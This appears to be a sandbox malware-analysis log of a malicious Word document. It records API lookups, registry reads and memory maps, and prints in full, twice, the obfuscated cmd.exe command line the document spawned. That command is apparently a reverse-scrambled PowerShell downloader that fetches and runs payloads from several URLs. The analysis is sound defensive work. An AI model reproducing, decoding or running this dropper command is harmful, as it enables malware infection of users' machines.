|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee37bfcd0 |
|
1 | |
| Get Address | Unknown module name | function = 698, address_out = 0x7fee40fb230 |
|
1 | |
| Get Address | Unknown module name | function = 614, address_out = 0x7fee42a3304 |
|
1 | |
| Get Address | Unknown module name | function = 582, address_out = 0x7fee42a32b4 |
|
1 | |
| Get Address | Unknown module name | function = 626, address_out = 0x7fee42d2a80 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 840, y_out = 253 |
|
1 | |
| Get Cursor | x_out = 989, y_out = 402 |
|
1 | |
| Get Cursor | x_out = 470, y_out = 293 |
|
1 | |
| Get Time | type = System Time, time = 2018-11-24 01:39:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 125939 |
|
1 | |
| Get Time | type = Local Time, time = 2018-11-24 01:39:36 (Local Time) |
|
9 | |
| Get Time | type = Local Time, time = 2018-11-24 01:39:37 (Local Time) |
|
4 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c c^MD; ; ;/V ^ ; /c " ;; ; ( (^SE^T ^0t=Sn tA ^ ^f^ Jn^ LM^ ev zk^ b4^ Ts md dB^ RP ^OQ ^ZF^ Dp 9P^ VN^ 4^o}^IF}^lV{QVhsRc^tet^UEaqJcw^m}xH}Zz^kJVaRX^eXMr^mBbQ^k^;20^l^8Ti5dXWS^$^gG^ b^6^siLsRPeR^QcaJo6lryFP5b-^3^Gtk0rF^Jas^lt^AqSk^X;74^)A8l8Mi8bXRV$Oa^(^Q^t^e^h^Q^lCViIa^fZcoJ7tqieA1vB^laFH^sn8^.23i^H^9vsvR^lC$Z^A^;FO^)Akyt9^d4j^oG0B2T^et^X^sYvn^4C^oUzpV^Bs^hJ^e8CrV6.BNF^fwflss^Sy$^bv^(8we^UV^trJ^i3drbYw^Yq^.evi^6Bv78RMf$^b1;W^H1BT mK^=e9 s^3ePDpVlyZ^jtci.^BD^io^evRBRi^w^$y9^;nv^)B^e^(^SCnqmechp5Ko^Qh.UMiFkvurR8V^$Tm{^kA KC^)V40Lk^0v22N^d 1cqaLe5C^-iM ipsoru^O^WtGp^aeft4T^Sq1.^MFFdnfr^ssZi$Rx^(2s^ 5vfUWIGH;DC^)GW^(re^d8^Eneg^eWp^sRf.^dp^F^h^Qfo^Sse $tO;XN^)0Z09O, Mh4e^purpvQ$er,Qg^'4GT^sNEvjG^Of^'EX^(^a3n8Q^eW7pH8oLb.RAFMrfbKsPB$hX^{x6yharJF^tyD{c^k^)f^8jF2^D8O^i4F$U^Q w^WngBi^Xv^ gH^h2QpnGpFl^$ev^(M ^hEqcTyaxIeR^Mr8loAXfl^3^;YC^'hVm^oJa^e^4^e8wroL^tjssHG.^4hbz7^d^pro0Q^dSYa6C^'Z^ SymXVojCcr^T^-M^ ^O^gtudcDm^eeg^jqAb^ZoOm -Diw1^ieEeN^L^9 O^z=c^e ^Wbi^D0vmsRVz$A^e;7o'Vu^pK^Ht56^ts5hv^JlK^BmIBxRS^.Ga^29tlXhmg5x0Bs^9Zm1d'c^G e2^mH^XoG^tc^i^d-Np ^OXttrcngeXnjoH^beh^OLN-PD^wYhe^p1NI0=MG idFy4^fT^4sYV$K9^;^ i^)GF'bj^elCx^OReT^ ^.t8^Au^E^tcJ^jkg\Ey'Di+4^X^)BV^(t4h9U^tKjaD^KP2dpwHm0bee7^T^pStCxeaoG^S3^:e7:8z]s3hdbt89aYeP0R.f^jOctI2R.SumqseLN^tYXst^TyzqSSN^[zt^(wg^=4^al8Mid^gXIx$WP;Qh^)uH^'2E^@OY^'dw^(yXte^hiF2^l^3R^phHS8E^.^wf'^dWQUKjKk^ZVyAzlYNT6fv8JV/r^Fiso^f^UG.G^U^ijqtVEo61kYPoZ^spiLp^t^qllIe^mlh^g^T.Pht5HeOssM^fivjt^XY^uSAu^2D/C^6/wA^:1bpQqthwt^5^1hvP@x^9ltsQVmjqpn^4^WDyV2^3a3^1tF^25euo^HR /UklkR^piP^.F5a^dNlaRehE^ivzrHrbkYa6n^g^HY^-LJnHAoP1^lW9ay^E^szS/^A^9/tk:^bip36tcx^taB^hOC@Ro^8AdqrIsLN7RTc^MVGGzhN^By5^9^uHV^z1m/^8N^u^ZTh2v.EHti^Qa42^lvg^o0^pkteoEis9^UzFxe4ud^e4rl^su^GyoLltN6/3p/WV:FKpdkt47^t^L^0hDJ@HFf^kHzG^d^BjeFOrHR0vwoyJ^ffR^xv^8N^F0m/^IZ^m7OoaFcv2^.^3kfMHf^5CoAjh^u0^m^q^0is^bmjc/lI/cC:MCp0^y^t^U^ t8d^hS^I@6E^AjVwW0RzIjH^Y3Tt^K9Z^0Gg/0Z^m^U^K^o^0wc^3F^. N^e^lMi^5^LvmUovFmCSgYfotMdBO^hxN^tqfi53w^l2^et^B^ffniP^slgC/R9/XU^:G4pgntsFt^Q^dhxY'r^I=Qpj58Dc^4i8k$k^I;^I^G'lAcPrQa^UX^S7'Ej^=rjp1Zm2k^X60^$0O^ 3elxYloOenN^hkTstjr7wevTw82o6vp) ; ; )& ; ; ^for ; ; /^L;;;%^X; ^IN ; ;; ( ^ 16^76^ ; ; ; -3 ^ ^2); ;; ^DO; ;( ( ( ; se^T ^q^JP=!^q^JP!!^0t:~%^X, 1!) ; ; ; ) )& ; ; ^i^f ; %^X ; ;; ; ^le^Q ; ; ; ^2; ( ; ; ; ( (CaL^L ;; %^q^JP:^*qJ^P^!=% ) ) )" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:10, Reason: Child Process |
| Unmonitor | End Time: 00:01:53, Reason: Self Terminated |
| Monitor Duration | 00:00:43 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa80 |
| Parent PID | 0x89c (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c30000 | 0x01c30000 | 0x01f72fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f80000 | 0x0224efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4aa40000 | 0x4aa98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee3210000 | 0x7fee3217fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xa9c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4aa40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-24 01:39:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 133365 |
|
1 |
Environment (23)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = ^X; ^IN ; ;; ( ^ 16^76^ ; ; ; -3 ^ ^2); ;; ^DO; ;( ( ( ; se^T ^q^JP=!^q^JP!!^0t |
|
1 | |
| Get Environment String | name = ^X, 1!) ; ; ; ) )& ; ; ^i^f ; |
|
1 | |
| Get Environment String | name = ^X ; ;; ; ^le^Q ; ; ; ^2; ( ; ; ; ( (CaL^L ;; |
|
1 | |
| Get Environment String | name = ^q^JP |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: cmd.exe
33393
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cMD ; ; ;/V ; /c " ;; ; ( (^SE^T ^0t=Sn tA ^ ^f^ Jn^ LM^ ev zk^ b4^ Ts md dB^ RP ^OQ ^ZF^ Dp 9P^ VN^ 4^o}^IF}^lV{QVhsRc^tet^UEaqJcw^m}xH}Zz^kJVaRX^eXMr^mBbQ^k^;20^l^8Ti5dXWS^$^gG^ b^6^siLsRPeR^QcaJo6lryFP5b-^3^Gtk0rF^Jas^lt^AqSk^X;74^)A8l8Mi8bXRV$Oa^(^Q^t^e^h^Q^lCViIa^fZcoJ7tqieA1vB^laFH^sn8^.23i^H^9vsvR^lC$Z^A^;FO^)Akyt9^d4j^oG0B2T^et^X^sYvn^4C^oUzpV^Bs^hJ^e8CrV6.BNF^fwflss^Sy$^bv^(8we^UV^trJ^i3drbYw^Yq^.evi^6Bv78RMf$^b1;W^H1BT mK^=e9 s^3ePDpVlyZ^jtci.^BD^io^evRBRi^w^$y9^;nv^)B^e^(^SCnqmechp5Ko^Qh.UMiFkvurR8V^$Tm{^kA KC^)V40Lk^0v22N^d 1cqaLe5C^-iM ipsoru^O^WtGp^aeft4T^Sq1.^MFFdnfr^ssZi$Rx^(2s^ 5vfUWIGH;DC^)GW^(re^d8^Eneg^eWp^sRf.^dp^F^h^Qfo^Sse $tO;XN^)0Z09O, Mh4e^purpvQ$er,Qg^'4GT^sNEvjG^Of^'EX^(^a3n8Q^eW7pH8oLb.RAFMrfbKsPB$hX^{x6yharJF^tyD{c^k^)f^8jF2^D8O^i4F$U^Q w^WngBi^Xv^ gH^h2QpnGpFl^$ev^(M ^hEqcTyaxIeR^Mr8loAXfl^3^;YC^'hVm^oJa^e^4^e8wroL^tjssHG.^4hbz7^d^pro0Q^dSYa6C^'Z^ SymXVojCcr^T^-M^ ^O^gtudcDm^eeg^jqAb^ZoOm -Diw1^ieEeN^L^9 O^z=c^e ^Wbi^D0vmsRVz$A^e;7o'Vu^pK^Ht56^ts5hv^JlK^BmIBxRS^.Ga^29tlXhmg5x0Bs^9Zm1d'c^G e2^mH^XoG^tc^i^d-Np ^OXttrcngeXnjoH^beh^OLN-PD^wYhe^p1NI0=MG idFy4^fT^4sYV$K9^;^ i^)GF'bj^elCx^OReT^ ^.t8^Au^E^tcJ^jkg\Ey'Di+4^X^)BV^(t4h9U^tKjaD^KP2dpwHm0bee7^T^pStCxeaoG^S3^:e7:8z]s3hdbt89aYeP0R.f^jOctI2R.SumqseLN^tYXst^TyzqSSN^[zt^(wg^=4^al8Mid^gXIx$WP;Qh^)uH^'2E^@OY^'dw^(yXte^hiF2^l^3R^phHS8E^.^wf'^dWQUKjKk^ZVyAzlYNT6fv8JV/r^Fiso^f^UG.G^U^ijqtVEo61kYPoZ^spiLp^t^qllIe^mlh^g^T.Pht5HeOssM^fivjt^XY^uSAu^2D/C^6/wA^:1bpQqthwt^5^1hvP@x^9ltsQVmjqpn^4^WDyV2^3a3^1tF^25euo^HR /UklkR^piP^.F5a^dNlaRehE^ivzrHrbkYa6n^g^HY^-LJnHAoP1^lW9ay^E^szS/^A^9/tk:^bip36tcx^taB^hOC@Ro^8AdqrIsLN7RTc^MVGGzhN^By5^9^uHV^z1m/^8N^u^ZTh2v.EHti^Qa42^lvg^o0^pkteoEis9^UzFxe4ud^e4rl^su^GyoLltN6/3p/WV:FKpdkt47^t^L^0hDJ@HFf^kHzG^d^BjeFOrHR0vwoyJ^ffR^xv^8N^F0m/^IZ^m7OoaFcv2^.^3kfMHf^5CoAjh^u0^m^q^0is^bmjc/lI/cC:MCp0^y^t^U^ t8d^hS^I@6E^AjVwW0RzIjH^Y3Tt^K9Z^0Gg/0Z^m^U^K^o^0wc^3F^. N^e^lMi^5^LvmUovFmCSgYfotMdBO^hxN^tqfi53w^l2^et^B^ffniP^slgC/R9/XU^:G4pgntsFt^Q^dhxY'r^I=Qpj58Dc^4i8k$k^I;^I^G'lAcPrQa^UX^S7'Ej^=rjp1Zm2k^X60^$0O^ 3elxYloOenN^hkTstjr7wevTw82o6vp) ; ; )& ; ; ^for ; ; /^L;;;%^X; ^IN ; ;; ( ^ 16^76^ ; ; ; -3 ^ ^2); ;; ^DO; ;( ( ( ; se^T ^q^JP=!^q^JP!!^0t:~%^X, 1!) ; ; ; ) )& ; ; ^i^f ; %^X ; ;; ; ^le^Q ; ; ; ^2; ( ; ; ; ( (CaL^L ;; %^q^JP:^*qJ^P^!=% ) ) )" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:11, Reason: Child Process |
| Unmonitor | End Time: 00:01:53, Reason: Self Terminated |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0xa80 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
